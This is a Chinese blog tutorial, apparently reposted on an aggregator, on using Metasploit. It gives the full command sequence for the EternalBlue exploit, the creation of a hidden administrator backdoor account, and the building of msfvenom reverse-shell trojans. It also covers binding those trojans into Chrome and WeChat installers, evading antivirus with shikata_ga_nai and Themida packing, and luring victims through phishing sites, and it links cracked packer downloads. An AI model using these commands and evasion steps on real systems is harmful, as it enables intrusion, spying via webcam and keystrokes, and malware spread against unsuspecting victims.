【P3】kali 最强渗透工具 - metasploit(安装配置及使用教程详解)

news2024/11/16 9:43:28

文章目录

    • 一、metasploit 是什么?
    • 二、metasploit 攻击 windows 操作系统
    • 三、metasploit 攻击永恒之蓝全流程
    • 四、metasploit 攻击成功后能做什么
      • 4.1、操作步骤
      • 4.2、攻击示例
    • 五、msfvenom 绕过杀毒软件技巧
      • 5.1、捆绑木马
      • 5.2、加壳:压缩壳、加密壳
        • 5.2.1、Themida:加壳软件
          • 5.2.1.1、Linux 下安装 Themida
          • 5.2.1.2、windows 下安装 Themida
          • 5.2.1.2、Themida 使用教程


包括 metasploit 是什么?、metasploit 攻击 windows 操作系统、metasploit 攻击永恒之蓝全流程、使用 Kali 渗透工具生成远控木马、metasploit 攻击示例、msfvenom 绕过杀毒软件技巧之捆绑木马、msfvenom 绕过杀毒软件技巧之加壳、windows 下安装 Themida、Themida 使用教程。


一、metasploit 是什么?

Kali 最强渗透工具 - metasploit

  • msf 是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的 shellcode,并持续保持更新

  • metasploit 让复杂的漏洞攻击流程变的非常简单,一个电脑小白经过几小时的学习,就能对操作系统等主流漏洞发起危害性攻击

二、metasploit 攻击 windows 操作系统

1、msfconsole:启动 metasploit 命令行 [命令行效率高,使用方便]

2、启动 metasploit 前需要做:

  • 打开 kali 终端

  • 使用 sudo su 命令,并输入 kali 的密码 kali,切换至 root 用户

  • 使用 msfdb init 命令初始化 metasploit 数据库(*可选)

3、操作步骤:

(1)、sudo su 切换到超级管理员 root 用户,密码 kali(无 root 用户需自行创建一个)

  • sudo su

在这里插入图片描述

(2)、msfconsole 启动 metasploit 命令行界面

  • msfconsole

在这里插入图片描述

三、metasploit 攻击永恒之蓝全流程

永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件

1、使用模块:use exploit/windows/smb/ms17_010_eternalblue

2、设置必选项:查看必选项 [*required 为 yes 的就是必选项] show options

3、操作步骤

(1)、可以使用编号进行搜索模块,永恒之蓝编号被微软定义为 ms17_010

  • search ms17_010

在这里插入图片描述

  • exploit:漏洞攻击脚本

如图,可以通过 Description 查看模块是干什么的

(2)、使用模块

两种方法:

  • use 模块名称

  • use 模块编号

在这里插入图片描述

(3)、配置(设置)模块,可以先查看有哪些设置,告诉 msf 攻击谁,要干啥

  • show options

在这里插入图片描述

  • Required(必选项):只需要配置必选项为 yes 的即可

  • RHOSTS:地址

  • RPORT:端口,默认445

  • VERIFY_ARCH、VERIFY_TARGET:这两选项已经是配置好的,保持默认即可

  • Payload options:攻击载荷,默认 windows/x64/meterpreter/reverse_tcp:获取到目标机器的命令执行权限;攻击之后,你想干啥

  • EXITFUNC:默认已经配置好

  • LHOST:监听地址,攻击机的ip地址

  • LPORT:监听端口

(4)、启动靶机,win 7

  • 靶机安装参考:https://blog.csdn.net/qq_45138120/article/details/131350059

  • 靶机为 VMware 下的 Windows 虚拟机,Windows 版本无所谓

(5)、打开 cmd,使用 ipconfig 查看靶机 ip 地址

  • ipconfig

在这里插入图片描述

(6)、kali 设置攻击靶机地址

  • set RHOSTS 靶机ip

在这里插入图片描述

(7)、设置完毕后,可以再次使用 show options 查看是否配置齐全

  • show options

在这里插入图片描述

如图:查看 Required 配置项为 yes 的 Current Setting 当前设置是否为空,不为空即配置完毕

(8)、可以修改下默认的 LHOST 端口

  • set lport 22222

在这里插入图片描述

注:端口范围 0-65535


扩展:查看端口是否开放

① 查看445端口是否开启

  • netstat -an

在这里插入图片描述

② 此处攻击靶机一定要关闭防火墙

在这里插入图片描述


(9)、运行模块

  • run

在这里插入图片描述

如图,会自动进行攻击靶机,并且获取命名执行权限。攻击成功后,先打印 WIN 并进入 meterpreter

meterpreter:拿到了 Win 7 靶机的权限

(10)、可以使用 help 查看可以使用的命令

在这里插入图片描述

  • Command:命令

  • Description:命令的描述或解释

  • shutdown:关机

  • User interface Commands:用户接口命令

  • getdesktop:截图

  • keyscna:发送键盘指令

  • mouse:发送鼠标指令

(11)、退出

  • exit

在这里插入图片描述

四、metasploit 攻击成功后能做什么

1、攻击成功后能做什么

  • meterpreter 是强大的后渗透模块,可以输入 help 查看帮助信息

  • 远程控制、命令执行、摄像头监控、密码获取、创建后门用户、破坏篡改系统…这些看起来非常复杂又高级的操作都能用 meterpreter 中一行或几个字母,简单的命令完成

  • 例:创建后门用户并开启远程连接

    • shell

    • net user zhangsan 123456 /add && net localgroup administrators zhangsan /add

    • exit

    • run getgui -e

2、使用 Kali 渗透工具生成远控木马

(1)、msfvenom 是用来生成后门的软件,在目标机上执行后门,在本地监听上线

  • venom:毒,毒液

  • [* msfvenom 在 shell 里使用,不是 msfconsole 终端]

(2)、windows 可执行程序后门:

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.128 Iport=9999 -f exe -o demo.exe

  • msfvenom:执行使用的工具

  • -p:payload

  • windows/x64/meterpreter/reverse_tcp:payload_name 系统/架构/作用/方式;如果要攻击 Linux,将 windows 换成 Linux 即可(android,mac)

  • lhost=192.168.123.136 Iport=9999:payload设置(kali 地址,kali 端口)

  • -f:format

  • exe:exe,windows 可执行文件(ipk,jar,war)

  • -o:output,输入的文件名,如 demo.exe

4.1、操作步骤

(1)、生成木马文件

  • msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.128 Iport=9999 -f exe -o demo.exe

在这里插入图片描述

(2)、如图,文件生成在当前路径下

  • 可以使用 ls 进行查看

  • 可以使用 pwd 查看工作目录的绝对路径

在这里插入图片描述

(3)、可以使用钓鱼网站等诱骗受害人点击

在这里插入图片描述

(4)、将木马下载到本地,demo.exe

拉取到本地时,一定要关闭杀毒软件

木马病毒下载到本地会被杀毒软件截取,后续需要让木马绕过杀毒软件

在这里插入图片描述

木马病毒不可以直接运行,就跟钓鱼一样,需要将木马放在鱼钩上

(5)、终端控制台进入 msfconsole

  • msfconsole

在这里插入图片描述

(6)、使用 exploit/multi/handler 模块

  • use exploit/multi/handler

在这里插入图片描述

(7)、查看设置

  • show options

  • 可简写:options

在这里插入图片描述

  • Payload options:攻击载荷设置(设置成生成可执行程序后门时设置的 playload_name)

(8)、设置攻击载荷设置(设置成生成可执行程序后门时设置的 playload_name)

  • set payload windows/x64/meterpreter/reverse_tcp

在这里插入图片描述

(9)、设置 kali 地址

  • set lhost 192.168.159.128

在这里插入图片描述

(10)、设置端口(设置成生成可执行程序后门时设置的 Iport,必须一致)

  • set lport 9999

在这里插入图片描述

(11)、可以使用 options 再次查看设置信息

在这里插入图片描述

(12)、运行

  • run

在这里插入图片描述

现在鱼钩已经扔河里了,等待鱼儿上钩,有两种方法:1、将鱼儿摁在勾上,利用漏洞;2、姜太公钓鱼,愿者上钩。诱导鱼儿上钩

(13)、假如受害者上钩,双击本地的 deom.exe 文件

在这里插入图片描述

(14)、如图,受害者已上钩

在这里插入图片描述

  • meterpreter:获取到受害者电脑的执行权限

(15)、输入 help,查看可以执行的命令操作

  • help

在这里插入图片描述

4.2、攻击示例

(1)、webcam_list,查看受害者电脑是否有摄像头

  • webcam_list

在这里插入图片描述

(2)、我使用的是台式机,所以没有摄像头

五、msfvenom 绕过杀毒软件技巧

最基础的免杀 [ 对于其他杀毒软件效果不同,具体情况请自行尝试]*

5.1、捆绑木马

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.128 lport=9999 -f exe -x notepad++.exe -o notepad++.exe

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.128 lport=9999 -f exe -x chrome.exe -o chrome.exe

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.128 lport=9999 -f exe -x firefox.exe -o firefox.exe

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.128 lport=9999 -f exe -o firefox.exe

- -x:模板(要使用哪一个正常程序的模板作为后门的生成)
注:如果 notepad++ 过不了,可以换其它软件;路径下必须存在可执行程序
- -e /指定编码方式对攻击载荷进行重新编码
- -x /指定木马捆绑在哪个可执行程序模板上
- -i /指定对目标进行编码的次数,多次编码理论上有助于免杀的实现
- -f /指定 msf 编码器输出程序的格式
- -o /指定处理完毕后的文件输出路径

注:使用捆绑木马时,路径下必须存在可执行程序

(1)、在生成木马的路径下,先复制一个可执行程序过去,比如:chrome.exe

在这里插入图片描述

(2)、使用 msfvenom 生成一个 Windows 环境下的木马,并捆绑到 chrome.exe 上生成 chrome01.exe 的合成马

  • msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.128 lport=9999 -f exe -x chrome.exe -o chrome01.exe

其它示例:

  • msfvenom -p windows/shell_reverse_tcp LHOST=192.168.111.132 LPORT=9999 -e x86/shikata_ga_nai -x WeChatSetup.exe -i 12 -f exe -o /root/WeChatSetup1.exe

x86/shikata_ga_nai 进行多次编码的方式进行免杀处理

在这里插入图片描述

(3)、在此路径下,可以看到生成一个 chrome01.exe 的木马

在这里插入图片描述

5.2、加壳:压缩壳、加密壳

5.2.1、Themida:加壳软件

5.2.1.1、Linux 下安装 Themida
  • Themida Linux下rar包 百度网盘下载链接:https://pan.baidu.com/s/1v6q8y0Xg-SXMUXX4roEyJg?pwd=8fr8

  • 提取码:8fr8

注:此压缩包 rar包,必须在 Linux 系统下进行解压,使用需要在 windows 下使用


扩展:解压rar包

(1)、安装 rar 包教程参考:https://blog.csdn.net/weixin_40293999/article/details/122733513

(2)、解压rar包

在这里插入图片描述


5.2.1.2、windows 下安装 Themida
  • Themida windows下文件夹百度网盘下载链接:https://pan.baidu.com/s/1vGaNf92vzUZbsMlzMwXNFA?pwd=sfcx

  • 提取码:sfcx

  • 下载后得到名为 Themida_x32_x64_v3.0.4.0_Repacked 的文件夹

在这里插入图片描述

5.2.1.2、Themida 使用教程

(1)、打开下载后的 Themida_x32_x64_v3.0.4.0_Repacked 文件夹,双击 Themida.exe 执行文件

在这里插入图片描述

在这里插入图片描述

(2)、将未加壳的木马可执行程序拉到 Themida 软件中

在这里插入图片描述

在这里插入图片描述

  • 也可以在 Themida 软件中选择导入的木马文件路径

(3)、点击 Protext 进行加壳

在这里插入图片描述

自动进行加壳保护,成功后,在本地会生成一个添加 Protext 名称的文件

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/676998.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

分片和一致性哈希

在设计大规模分布式系统时,你可能会遇到两个概念——分片(sharding)和一致性哈希(consistent hashing)。虽然我在网上找到了很多关于这些术语的解释,但它们让我感到有些困惑。我觉得分片和一致性哈希本质上…

Web网页制作-知识点(2)——常用文本标签、列表标签、表格标签、Form表单、块元素与行内元素(内联元素)

目录 常用文本标签 列表标签 有序列表 无序列表 定义列表 表格标签 表格组成与特点 表格标签 表格属性 ​​​合并表格单元格 Form表单 属性说明 表单元素 文本框 密码框 提交按钮 块元素与行内元素(内联元素) 内联元素和块级元素…

Flink JdbcSink.sink源码解析及常见问题

文章目录 源码入口我们看下flush方法干了什么flush方法至此走完了,但是什么时机写入的数据呐?补充总结: 常见问题1. 为什么会出现JdbcSink.sink方法插入Mysql无数据的情况?2. JdbcSink.sink写Phoenix无数据问题 参考 基于Flink 1.…

设计模式之组合模式笔记

设计模式之组合模式笔记 说明Composite(组合)目录组合模式示例类图菜单组件抽象类菜单类菜单项类测试类 说明 记录下学习设计模式-组合模式的写法。JDK使用版本为1.8版本。 Composite(组合) 意图:将对象组合成树型结构以表示“部分-整体”的层次结构。Composite使得用户对单…

Linux网络-网络层IP协议

目录 IP协议 计算机网络分层 IP协议头格式 IP数据报 - 数据分片 数据报为什么要分片? 数据报分片是什么? 如何做到IP数据报分片? 分片demo示例 并不推荐分片,能不分片则不分片。 网段划分 前置了解 网络号和主机号 为…

如何监测和优化阿里云服务器的性能?有哪些性能分析工具和指标?

如何监测和优化阿里云服务器的性能?有哪些性能分析工具和指标?   阿里云服务器性能监测与优化是云计算服务中一个非常重要的环节。为了确保服务器稳定、高效地运行,我们需要对其性能进行监测,并在监测的基础上进行优化。本文将为…

Packet Tracer - 综合技能练习(配置 VLAN、中继、DHCP 服务器、DHCP 中继代理,并将路由器配置为 DHCP 客户端)

Packet Tracer - 综合技能练习 地址分配表 设备 接口 IP 地址 子网掩码 默认网关 R1 G0/0.10 172.31.10.1 255.255.255.224 不适用 G0/0.20 172.31.20.1 255.255.255.240 不适用 G0/0.30 172.31.30.1 255.255.255.128 不适用 G0/0.40 172.31.40.1 255.255…

MySQL权限控制及日志管理

MySQL权限控制及日志管理 用户权限管理 创建用户 CREATE USER 用户名IP地址 [ IDENTIFIED BY 密码 ];GRANT SELECT ON *.* TO 用户名’IP地址’ IDENTIFIED BY "密码";--创建一个用户名为Usr1 密码为 Usr1.mysql的用户 并授权 CREATE USER…

无忧行:突破网络封锁、跨境访问国外的网站和应用程序(安装注册及使用教程详解)

文章目录 步骤一:注册微软账号步骤二:修改账号的国家/地区步骤三:在Edge Dev浏览器中安装无忧行插件步骤四:创建 无忧行 账户步骤五:无忧行使用教程 包括注册微软账号、在Edge Dev浏览器中安装无忧行插件、创建 无忧行…

Python基础篇(六):组织管理代码—模块和包

组织管理代码—模块和包 前言模块(Module)创建模块使用模块 包(Package)创建包使用包 前言 在Python中,模块和包是组织和管理代码的重要概念。模块是一个包含 Python 定义和语句的文件,而包则是一组相关模块的目录。它们是组织和管理代码的强大工具&…

【跟小嘉学 Rust 编程】四、理解 Rust 的所有权概念

系列文章目录 【跟小嘉学 Rust 编程】一、Rust 编程基础 【跟小嘉学 Rust 编程】二、Rust 包管理工具使用 【跟小嘉学 Rust 编程】三、Rust 的基本程序概念 【跟小嘉学 Rust 编程】四、理解 Rust 的所有权概念 文章目录 系列文章目录前言一、所有权(Ownership)1.1.、所有权(Ow…

【unity每日一记】 Camera相机+ Screen屏幕+动画机

👨‍💻个人主页:元宇宙-秩沅 👨‍💻 hallo 欢迎 点赞👍 收藏⭐ 留言📝 加关注✅! 👨‍💻 本文由 秩沅 原创 👨‍💻 收录于专栏:uni…

Flutter开发——图片加载与缓存源码解析

在Flutter中有个图片组件:Image,通常会使用它的Image.network(src)、Image.file(src)、Image.asset(src)来加载图片。 下面是Image的普通构造方法: const Image({super.key,required this.image,this.frameBuilder,this.loadingBuilder,this.errorBuilde…

第四章 机器学习

文章目录 第四章 决策树4.1基本流程4.2划分选择4.2.1信息增益4.2.2增益率4.2.3基尼指数 4.3剪枝处理4.3.1预剪枝4.3.2后剪枝 4.4连续与缺失值4.4.1连续值处理4.4.2缺失值处理 4.5多变量决策树 第四章 决策树 4.1基本流程 决策过程: 基本算法: 4.2划…

git——使用ssh连接远程仓库

文章目录 前言一. 获取邮箱和密码1. 本地配置你的名字和邮箱2. 使用命令获取你本地的邮箱和密码 二、生成ssh公钥1.任意一个文件夹路径打开Git Bash Here并输入以下命令连按三次回车2. 根据上面红框部分的地址打开文件夹3. 打开并查看id_rsa.pub 文件 三、在GitHub上连接ssh1. …

电商API知识点整理(一)商品采集接口获取商品详情数据API

商品采集接口背景 电商商品采集接口是一种机器人软件接口,用于从电子商务网站上爬取商品信息。它的主要作用是将电商网站上的商品信息采集和整合,方便用户使用。传统的商品采集需要人工收集和整理,工作量大、效率低;而电商商品采…

Flutter的文本、图片和按钮使用

像视图数据流转机制、底层渲染方案、视图更新策略等知识,都是构成一个UI框架的根本,看似枯燥,却往往具有最长久的生命力。 因此, 只有把这些最基础的知识弄明白,修好内功,才能触类旁通,由点及面…

输入阻抗、输出阻抗和阻抗匹配

读者问了一个问题:“集总参数电路中,阻抗匹配(内阻外阻)可以使负载得到最大的功率输出”这句话怎么理解? 这里涉及到几个概念:输入阻抗、输出阻抗、阻抗匹配,今天简单的聊一聊。 先了解一下阻…

用Visual Studio 2022写出你第一个Windows程序(程序保证能正常运行)

我是荔园微风,作为一名在IT界整整25年的老兵,今天来看看如何用Visual C写出你第一个Windows程序。 与其看很多Windows的书,不如先自己动手写一个Windows程序。由于Windows程序的特有机制,不建议去写那种简单的HELLO WORLD&#x…

【计算机网络详解】——网络层(学习笔记)

📖 前言:网络层它承担着网络间的数据传输和路由选择等核心任务,通过在传输层协议的基础上添加了路由和转发等功能,使得数据能够在全球范围内的互联网中自由流动。在这篇博客中,我们将深入探讨网络层的工作原理和具体实…